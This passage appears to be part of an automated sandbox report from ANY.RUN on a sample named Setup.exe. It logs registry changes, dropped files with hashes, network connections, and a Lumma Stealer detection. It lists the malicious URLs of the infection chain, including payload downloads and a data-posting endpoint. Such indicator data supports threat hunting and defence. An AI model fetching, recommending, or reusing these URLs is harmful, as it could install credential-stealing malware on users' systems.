6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
1
Suspicious files
2
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
4128more.comC:\Users\admin\AppData\Local\Temp\dpwtrsonvrtk
MD5:
SHA256:
3436msiexec.exeC:\Users\admin\AppData\Roaming\QKZ2HX.csv
MD5:
SHA256:
4320Setup.exeC:\Users\admin\AppData\Local\Temp\114d9e7bimage
MD5:047000E95690F931B9FAADF4547FFD8A
SHA256:3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016Setup.exeC:\Users\admin\AppData\Local\Temp\11acdc6bimage
MD5:047000E95690F931B9FAADF4547FFD8A
SHA256:3D536FB5D4D3B7AD2D3CE4827E46703483CACC5214D8C2F4220BC8D47E5BE7EC
6016Setup.exeC:\Users\admin\AppData\Local\Temp\11cb7cf5binary
MD5:8634AC2835A27ABF4B59A28E5A43EF9A
SHA256:33B81DDD408703B7059EB33193634F6A648B410945995312A6FC08CC7DD349C9
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vvvtqdw5.ot1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:BAD5A3EC3F7D4CD5EE2363B17E905324
SHA256:B7A40FBA08F044E4538557AEB35247E8A3C71EFD5FC3BAF79663490C41D6CEFB
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kc2iydey.ata.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z44eh4lq.ahs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4980powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlnpxge3.zax.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
20
TCP/UDP connections
29
DNS requests
13
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.194:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1596
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
104.20.3.235:443
https://pastebin.com/raw/erLX7UsT
unknown
text
619 b
shared
GET
200
172.67.167.196:443
https://silversky.club/4b882c8/script
unknown
text
331 b
malicious
GET
200
172.67.154.155:443
https://zasa.r2cloudmikudau8.shop/runcl.bin
unknown
executable
921 Kb
GET
200
104.21.11.197:443
https://snowqueen.site/calling.php?compName=DESKTOP-JGLLJLD
unknown
text
8.93 Kb
GET
200
104.21.6.29:443
https://zasa.r2cloudmikudau8.shop/ldr_cp_sh
unknown
executable
173 Kb
GET
200
104.21.6.29:443
https://zasa.r2cloudmikudau8.shop/clp_sh.32
unknown
binary
5.72 Mb
POST
200
188.114.96.3:443
https://mysticriver.shop/api
unknown
text
16 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1596
svchost.exe
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.194:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1596
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.48.23.194
  • 23.48.23.147
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.143
  • 23.48.23.169
  • 23.48.23.158
  • 23.48.23.180
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
mysticriver.shop
  • 188.114.97.3
  • 188.114.96.3
unknown
pastebin.com
  • 104.20.4.235
  • 104.20.3.235
  • 172.67.19.24
shared
cdn1.pixel-story.shop
unknown
silversky.club
  • 172.67.167.196
  • 104.21.58.9
malicious
zasa.r2cloudmikudau8.shop
  • 104.21.6.29
  • 172.67.154.155
unknown
snowqueen.site
  • 104.21.11.197
  • 172.67.150.60
unknown

Threats

PID
Process
Class
Message
3436
msiexec.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Setup.exe